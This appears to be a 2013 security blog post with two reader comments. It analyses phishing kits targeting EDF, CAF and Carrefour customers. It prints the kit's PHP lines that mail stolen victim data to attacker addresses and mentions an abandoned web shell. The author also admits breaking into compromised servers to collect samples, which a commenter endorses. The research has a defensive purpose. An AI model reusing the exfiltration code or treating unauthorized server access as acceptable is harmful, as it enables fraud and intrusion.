Monday 4 February 2013

Phish-BankFraud (EDF, CAF, and now Carrefour)

These days they do EDF+CAF and back with Carrefour.

 EDF: http://www.phishtank.com/phish_detail.php?phish_id=1720045 > 2/33

bigcave.php:
$send = "Ayoub.boos7@hotmai1.fr";
$subject = "EDF : $ip";
$from = "From: Tool4Spam.Com";

mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);

Dumped pages: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18023
Shells: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p18024

Mechanism is interesting on this one

It extract a zip file inside a a freslhy created dir and write EDF customer IP on Vcounter.txt

Seem the bad guys tested it to see if everything work :)
It's always these 41.x IP from Morocco.
(CF: Access logs of http://www.xylibox.com/2013/01/phish-bankfraudphpmailerphpshell.html)

The bad guys leaved Backdoor.PHP.WebShell.BD (WSO 2.4) as usual:

'Nice'

Spamtool:

And some others craps...

For CAF and Carrefour they have not used Hijacked servers (just for redirect).
Carrefour: http://www.phishtank.com/phish_detail.php?phish_id=1719809
CAF: http://www.phishtank.com/phish_detail.php?phish_id=1719804

The CAF mail is just a big failure:

Bank customers reply to phishing e-mail:
---
---
---
---
---
---
---
---

A new tool appeared, phishers will be probably interested.

Also i got an interesting mail:
That become a problem when hackers use hijacked servers (especially for phishing and malware hosting)
I concider myself as borderline, i re-break theses servers with my real IP to get the malicious stuff.
I leave files untouched, including hackers files, sometime i probably make more shit than them on log files, i don't edit thems to hide my IP.
I never got sued for hacking a compromised machine and i hope that will not happen.

2 comments:

  1. Hope you won't get sued for your interesting work.

    ReplyDelete
  2. Déjà qu'ils ne voient pas que leur serveur est corrompu, alors qu'il se rendent compte que tu es venu faire un tour... tu peux rester tranquille :)
    En tout cas continu comme ça, tes articles sont vraiment sympa!

    ReplyDelete